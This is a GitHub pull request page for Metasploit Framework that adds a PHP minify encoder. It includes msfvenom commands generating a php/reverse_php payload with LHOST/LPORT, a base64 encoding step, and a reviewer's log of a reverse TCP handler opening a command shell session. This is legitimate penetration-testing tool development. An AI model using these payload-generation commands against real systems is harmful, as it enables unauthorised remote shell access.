Add an encoder to minify php payloads #19435

jvoisin · 2024-09-01T21:02:48Z

$ ./msfvenom --platform php -a php -p php/reverse_php | ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
No encoder specified, outputting raw payload
Payload size: 3010 bytes
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4052 (iteration=0)
php/base64 chosen with final size 4052
Payload size: 4052 bytes

No syntax errors detected in Standard input code
$ ./msfvenom --platform php -a php -p php/reverse_php -e php/minify | ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/minify
php/minify succeeded with size 2109 (iteration=0)
php/minify chosen with final size 2109
Payload size: 2109 bytes

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 2839 (iteration=0)
php/base64 chosen with final size 2839
Payload size: 2839 bytes

No syntax errors detected in Standard input code
$

```console $ ./msfvenom --platform php -a php -p php/reverse_php | ./msfvenom -e php/base64 --platform php -a php | php -l Attempting to read payload from STDIN... No encoder specified, outputting raw payload Payload size: 3010 bytes Found 1 compatible encoders Attempting to encode payload with 1 iterations of php/base64 php/base64 succeeded with size 4052 (iteration=0) php/base64 chosen with final size 4052 Payload size: 4052 bytes No syntax errors detected in Standard input code $ ./msfvenom --platform php -a php -p php/reverse_php -e php/minify | ./msfvenom -e php/base64 --platform php -a php | php -l Attempting to read payload from STDIN... Found 1 compatible encoders Attempting to encode payload with 1 iterations of php/minify php/minify succeeded with size 2109 (iteration=0) php/minify chosen with final size 2109 Payload size: 2109 bytes Found 1 compatible encoders Attempting to encode payload with 1 iterations of php/base64 php/base64 succeeded with size 2839 (iteration=0) php/base64 chosen with final size 2839 Payload size: 2839 bytes No syntax errors detected in Standard input code $ ```

jheysel-r7

Thanks for the great addition @jvoisin, makes sense, looks good and works without issue!

Testing

Before:

➜  metasploit-framework git:(upstream-master) ✗ bundle exec ./msfvenom --platform php -a php -p php/reverse_php LHOST=172.16.199.1 LPORT=4444 |  bundle exec ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
No encoder specified, outputting raw payload
Payload size: 2993 bytes
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4029 (iteration=0)
php/base64 chosen with final size 4029
Payload size: 4029 bytes

No syntax errors detected in Standard input code

After / with new encoder:

➜  metasploit-framework git:(5b94c7e2d4) ✗  bundle exec ./msfvenom --platform php -a php -p php/reverse_php LHOST=172.16.199.1 LPORT=4444 -e php/minify |  bundle exec ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/minify
php/minify succeeded with size 2078 (iteration=0)
php/minify chosen with final size 2078
Payload size: 2078 bytes

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 2798 (iteration=0)
php/base64 chosen with final size 2798
Payload size: 2798 bytes

No syntax errors detected in Standard input code

Ensuring the payload generated with the new encoder works:

msf6 payload(php/reverse_php) > to_handler
[*] Payload Handler Started as Job 1

[*] Started reverse TCP handler on 172.16.199.1:4444
msf6 payload(php/reverse_php) > [*] Command shell session 16 opened (172.16.199.1:4444 -> 172.16.199.1:55241) at 2024-09-04 14:27:53 -0700

msf6 payload(php/reverse_php) > sessions -l

Active sessions
===============

  Id  Name  Type           Information  Connection
  --  ----  ----           -----------  ----------
  16        shell php/php               172.16.199.1:4444 -> 172.16.199.1:55241 (172.16.199.1)

msf6 payload(php/reverse_php) > sessions -i -1
[*] Starting interaction with 16...

id
uid=1000(msfuser) <redacted>

jheysel-r7 · 2024-09-04T21:48:36Z

Release Notes

This encoder minifies PHP payloads by removing spaces after keywords and before block openings. It removes comments, empty lines, new lines and leading and trailing spaces

jvoisin force-pushed the minify_php branch from f9823d1 to 9442dee Compare September 1, 2024 21:05

jvoisin force-pushed the minify_php branch from 9442dee to 5b94c7e Compare September 1, 2024 21:09

jheysel-r7 self-assigned this Sep 4, 2024

jheysel-r7 reviewed Sep 4, 2024

View reviewed changes

jheysel-r7 added enhancement payload rn-payload-enhancement release notes for enhanced payloads labels Sep 4, 2024

jheysel-r7 merged commit 4712bb4 into rapid7:master Sep 4, 2024
40 checks passed

This pull request was closed.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Add an encoder to minify php payloads #19435

Add an encoder to minify php payloads #19435

jvoisin commented Sep 1, 2024

jheysel-r7 left a comment

jheysel-r7 commented Sep 4, 2024

Add an encoder to minify php payloads #19435

Add an encoder to minify php payloads #19435

Conversation

jvoisin commented Sep 1, 2024

jheysel-r7 left a comment

Choose a reason for hiding this comment

Testing

jheysel-r7 commented Sep 4, 2024

Release Notes